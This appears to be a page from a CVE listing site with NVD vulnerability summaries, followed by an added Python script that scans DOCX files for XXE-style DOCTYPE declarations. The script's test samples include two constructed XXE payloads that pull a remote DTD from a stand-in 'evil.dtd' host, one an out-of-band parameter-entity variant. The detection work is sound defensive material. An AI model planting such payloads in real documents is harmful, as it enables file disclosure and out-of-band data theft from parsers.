CVE Vulnerabilities

Below is the list of the latest vulnerabilities published by NIST (the National Vulnerability Database):

CVE ID Published Severity CVSS Description
CVE-2023-28152 2023-03-24 MEDIUM 5.3 An issue was discovered in Independentsoft JWord before 1.1.110. The API is prone to XML external entity (XXE) injection via a remote DTD in a DOCX file.
CVE-2023-26098 2023-04-25 HIGH 8.2 An issue was discovered in the Open Document feature in Telindus Apsal 3.14.2022.235 b. An attacker may upload a crafted file to execute arbitrary code.
CVE-2023-26099 2023-04-24 MEDIUM 4.4 An issue was discovered in Telindus Apsal 3.14.2022.235 b. The consultation permission is insecure.
CVE-2023-26097 2023-04-24 HIGH 8.4 An issue was discovered in Telindus Apsal 3.14.2022.235 b. Unauthorized actions that could modify the application behaviour may not be blocked.
CVE-2023-28150 2023-03-24 MEDIUM 5.3 An issue was discovered in Independentsoft JODF before 1.1.110. The API is prone to XML external entity (XXE) injection via a remote DTD in a DOCX file.
CVE-2022-45167 2023-01-10 MEDIUM 4.3 An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application allows a basic user to access the profile information of all connected users.
CVE-2022-45166 2023-01-10 MEDIUM 6.5 An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application accepts a set of user-controlled parameters that are used to act on the…
CVE-2022-45165 2023-01-10 MEDIUM 6.5 An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application accepts a user-controlled parameter that is used to create an SQL query. It…
CVE-2022-45164 2023-01-10 MEDIUM 4.3 An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application allows a basic user to cancel (delete) a booking, created by someone else…
CVE-2022-38482 2023-01-10 MEDIUM 4.3 A link-manipulation issue was discovered in Mega HOPEX 15.2.0.6110 before V5CP4.
CVE-2022-38481 2023-01-10 MEDIUM 6.1 An issue was discovered in Mega HOPEX 15.2.0.6110 before V5CP2. The application is prone to reflected Cross-site Scripting (XSS) in several features.
CVE-2022-37028 2022-09-27 MEDIUM 5.4 ISAMS 22.2.3.2 is prone to stored Cross-site Scripting (XSS) attack on the title field for groups, allowing an attacker to store a JavaScript payload that will be executed…
CVE-2022-36443 2023-01-10 HIGH 7.8 An issue was discovered in Zebra Enterprise Home Screen 4.1.19. The device allows the administrator to lock some communication channels (wireless and SD card) but it is still…
CVE-2022-36442 2023-01-10 MEDIUM 5.5 An issue was discovered in Zebra Enterprise Home Screen 4.1.19. By using the embedded Google Chrome application, it is possible to install an unauthorized application via a downloaded…
CVE-2022-36441 2023-01-10 HIGH 7.1 An issue was discovered in Zebra Enterprise Home Screen 4.1.19. The Gboard used by different applications can be used to launch and use several other applications that are…
CVE-2022-34910 2023-02-27 MEDIUM 4.1 An issue was discovered in the A4N (Aremis 4 Nomad) application 1.5.0 for Android. It uses a local database to store data and accounts. However, the password is…
CVE-2022-34909 2023-02-27 HIGH 7.7 An issue was discovered in the A4N (Aremis 4 Nomad) application 1.5.0 for Android. It allows SQL Injection, by which an attacker can bypass authentication and retrieve data…
CVE-2022-34908 2023-02-27 HIGH 8.2 An issue was discovered in the A4N (Aremis 4 Nomad) application 1.5.0 for Android. It possesses an authentication mechanism; however, some features do not require any token or…
CVE-2022-30332 2023-01-10 MEDIUM 5.3 In Talend Administration Center 7.3.1.20200219 before TAC-15950, the Forgot Password feature provides different error messages for invalid reset attempts depending on whether the email address is associated with…
CVE-2022-29931 2022-06-25 MEDIUM 6.1 The administration interface of the Raytion Custom Security Manager (Raytion CSM) in Version 7.2.0 allows reflected Cross-site Scripting (XSS).
CVE-2022-24967 2022-06-02 MEDIUM 6.5 Black Rainbow NIMBUS before 3.7.0 allows stored Cross-site Scripting (XSS).
CVE-2022-24447 2022-03-02 MEDIUM 6.5 An issue was discovered in Zoho ManageEngine Key Manager Plus before 6200. A service exposed by the application allows a user, with the level Operator, to access stored…
CVE-2022-24446 2022-03-01 MEDIUM 4.3 An issue was discovered in Zoho ManageEngine Key Manager Plus 6.1.6. A user, with the level Operator, can see all SSH servers (and user information) even if no…
CVE-2021-44035 2021-12-17 MEDIUM 4.4 Wolters Kluwer TeamMate AM 12.4 Update 1 mishandles attachment uploads, such that an authenticated user may download and execute malicious files.
CVE-2021-43978 2021-12-08 HIGH 7.1 Allegro Windows 3.3.4152.0 embeds software administrator database credentials into its binary files, which allows users to access and modify data using the same credentials.
CVE-2021-42110 2021-12-08 HIGH 7.1 An issue was discovered in Allegro Windows (formerly Popsy Windows) before 3.3.4156.1. A standard user can escalate privileges to SYSTEM if the FTP module is installed, because of…
CVE-2021-42111 2021-11-10 MEDIUM 5.5 An issue was discovered in the RCDevs OpenOTP app 1.4.13 and 1.4.14 for iOS. If it is installed on a jailbroken device, it is possible to retrieve the…
CVE-2021-41320 2021-10-15 MEDIUM 5.5 A technical user has hardcoded credentials in Wallstreet Suite TRM 7.4.83 (64-bit edition) with higher privilege than the average authenticated user. NOTE: the vendor disputes this because the…
CVE-2021-38618 2021-10-04 HIGH 7.4 In GFOS Workforce Management 4.8.272.1, the login page of application is prone to authentication bypass, allowing anyone (who knows a user's credentials except the password) to get access…
CVE-2021-38617 2021-09-07 HIGH 8.8 In Eigen NLP 3.10.1, a lack of access control on the /auth/v1/user/ user creation endpoint allows a standard user to create a super user account with a defined…
CVE-2021-38616 2021-09-07 HIGH 7.6 In Eigen NLP 3.10.1, a lack of access control on the /auth/v1/user/{user-guid}/ user edition endpoint could permit any logged-in user to increase their own permissions via a user_permissions…
CVE-2021-38615 2021-09-07 MEDIUM 6.3 In Eigen NLP 3.10.1, a lack of access control on the /auth/v1/sso/config/ SSO configuration endpoint allows any logged-in user (guest, standard, or admin) to view and modify information.
CVE-2021-32018 2021-08-03 HIGH 8.5 An issue was discovered in JUMP AMS 3.6.0.04.009-2487. The JUMP SOAP API was vulnerable to arbitrary file reading due to an improper limitation of file loading on the…
CVE-2021-31399 2021-08-13 MEDIUM 4.6 On 2N Access Unit 2.0 2.31.0.40.5 devices, an attacker can pose as the web relay for a man-in-the-middle attack.
CVE-2021-32016 2021-08-03 CRITICAL 9.9 An issue was discovered in JUMP AMS 3.6.0.04.009-2487. A JUMP SOAP endpoint permitted the writing of arbitrary files to a user-controlled location on the remote filesystem (with user-controlled…
CVE-2021-32017 2021-08-03 CRITICAL 9.9 An issue was discovered in JUMP AMS 3.6.0.04.009-2487. A JUMP SOAP endpoint permitted the listing of the content of the remote file system. This can be used to…
CVE-2021-31531 2021-06-29 CRITICAL 9.8 Zoho ManageEngine ServiceDesk Plus MSP before 10521 is vulnerable to Server-Side Request Forgery (SSRF).
CVE-2021-31530 2021-06-29 HIGH 7.5 Zoho ManageEngine ServiceDesk Plus MSP before 10522 is vulnerable to Information Disclosure.
CVE-2021-31777 2021-04-28 MEDIUM 4.9 The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.
CVE-2021-31160 2021-06-29 HIGH 7.5 Zoho ManageEngine ServiceDesk Plus MSP before 10521 allows an attacker to access internal data.
CVE-2020-28918 2021-02-16 MEDIUM 5.3 DualShield 5.9.8.0821 allows username enumeration on its login form. A valid username results in prompting for the password, whereas an invalid one will produce an "unknown username" error…
CVE-2020-28406 2021-01-29 MEDIUM 6.5 An improper authorization vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an unauthorized user to access details about jobs he should not have access to via…
CVE-2020-28405 2021-01-29 HIGH 8.8 An improper authorization vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an unauthorized user to change the privileges of any user of the application. This can…
CVE-2020-28404 2021-01-29 MEDIUM 6.5 An improper authorization vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an unauthorized user to access the Billing page without the appropriate privileges.
CVE-2020-28403 2021-01-29 HIGH 8.0 A Cross-Site Request Forgery (CSRF) vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an attacker to change the privileges of any user of the application. This…
CVE-2020-8422 2020-01-31 MEDIUM 4.3 An authorization issue was discovered in the Credential Manager feature in Zoho ManageEngine Remote Access Plus before 10.0.450. A user with the Guest role can extract the collection…
CVE-2020-28402 2021-01-29 MEDIUM 5.4 An improper authorization vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an unauthorized user to access Launcher Configuration Panel.
CVE-2020-28401 2021-01-29 MEDIUM 6.5 An improper authorization vulnerability exists in Star Practice Management Web version 2019.2.0.6, allowing an unauthorized user to access WIP details about jobs he should not have access to.
CVE-2020-26167 2020-11-04 CRITICAL 9.8 In FUEL CMS 11.4.12 and before, the page preview feature allows an anonymous user to take complete ownership of any account including an administrator one.
CVE-2020-26546 2020-10-12 HIGH 7.5 An issue was discovered in HelpDeskZ 1.0.2. The feature to auto-login a user, via the RememberMe functionality, is prone to SQL injection. NOTE: This vulnerability only affects products…
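Two entries above (CVE-2023-28150 and CVE-2023-28152) describe the same weakness class: an API that parses the XML parts of a DOCX and honours a DOCTYPE pointing at a remote DTD, which is the entry point for XML external entity (XXE) injection. The following is an added triage check, written for this page and not taken from the page, from NIST, or from the affected vendor: it opens a DOCX as the OPC zip it is, scans every XML and .rels part for a DOCTYPE with an external identifier or an entity declaration, and reports the offending parts. A legitimately generated Office document carries no DOCTYPE at all, so any hit is worth quarantining. The sample documents, the `dtd.example.invalid` host name, and the minimal content-type and relationship parts are constructed for the example.

```python
"""Scan a DOCX (an OPC zip of XML parts) for DOCTYPE / external entity declarations.

Added example for triaging XXE-style DOCX payloads; the sample files below are
constructed inline and are not real malware samples.
"""
import io
import re
import zipfile
from typing import Dict, List

# A DOCTYPE declaration, optionally with an internal subset "[ ... ]".
# The internal subset may itself contain '>' (inside <!ENTITY ...>), so it is
# matched as a block up to the closing ']' before the final '>'.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b[^>\[]*(?:\[[^\]]*\])?\s*>", re.IGNORECASE | re.DOTALL)
# External identifiers: SYSTEM "uri" or PUBLIC "id" "uri" (remote or local DTD fetch).
_EXTERNAL_RE = re.compile(rb"\b(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
# Any entity declaration in the internal subset (general or parameter entity).
_ENTITY_RE = re.compile(rb"<!ENTITY\b", re.IGNORECASE)


def scan_docx(data: bytes) -> Dict[str, List[str]]:
    """Return {part_name: [issue, ...]} for every XML/.rels part carrying a DOCTYPE."""
    findings: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.endswith(".xml") or name.endswith(".rels")):
                continue  # images, fonts, etc. are not parsed as XML
            part = zf.read(name)
            issues: List[str] = []
            for match in _DOCTYPE_RE.finditer(part):
                decl = match.group(0)
                if _EXTERNAL_RE.search(decl):
                    issues.append("external DTD reference in DOCTYPE")
                if _ENTITY_RE.search(decl):
                    issues.append("entity declaration in internal subset")
                if not issues:
                    issues.append("DOCTYPE present")
            if issues:
                findings[name] = issues
    return findings


# Minimal OPC skeleton (constructed; enough for the scanner, not a full Word file).
_CONTENT_TYPES = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    b'<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    b'<Default Extension="xml" ContentType="application/xml"/>'
    b"</Types>"
)
_RELS = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>'
)
_W_NS = b'xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'

# Constructed sample document bodies.
CLEAN_DOC = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b"<w:document " + _W_NS + b"><w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p></w:body></w:document>"
)
# Remote DTD in the DOCTYPE, the pattern the two JWord/JODF entries describe.
REMOTE_DTD_DOC = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="no"?>\n'
    b'<!DOCTYPE w:document SYSTEM "http://dtd.example.invalid/evil.dtd">\n'
    b"<w:document " + _W_NS + b"><w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body></w:document>"
)
# Internal subset pulling a remote parameter entity (blind / out-of-band variant).
PARAM_ENTITY_DOC = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="no"?>\n'
    b'<!DOCTYPE w:document [<!ENTITY % ext SYSTEM "http://dtd.example.invalid/evil.dtd">%ext;]>\n'
    b"<w:document " + _W_NS + b"><w:body/></w:document>"
)


def build_docx(document_xml: bytes) -> bytes:
    """Pack a document.xml body into a minimal DOCX-shaped zip (constructed for the example)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", _CONTENT_TYPES)
        zf.writestr("_rels/.rels", _RELS)
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for label, body in (("clean", CLEAN_DOC), ("remote-dtd", REMOTE_DTD_DOC), ("param-entity", PARAM_ENTITY_DOC)):
        print(label, scan_docx(build_docx(body)))
```

This is a triage filter, not a fix: a clean result only means no DOCTYPE was found, and the real control is to configure the consuming XML parser to refuse DTD processing and external entity resolution entirely, so that a document which does carry one fails closed instead of triggering a network fetch.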
Page 1128 of 4308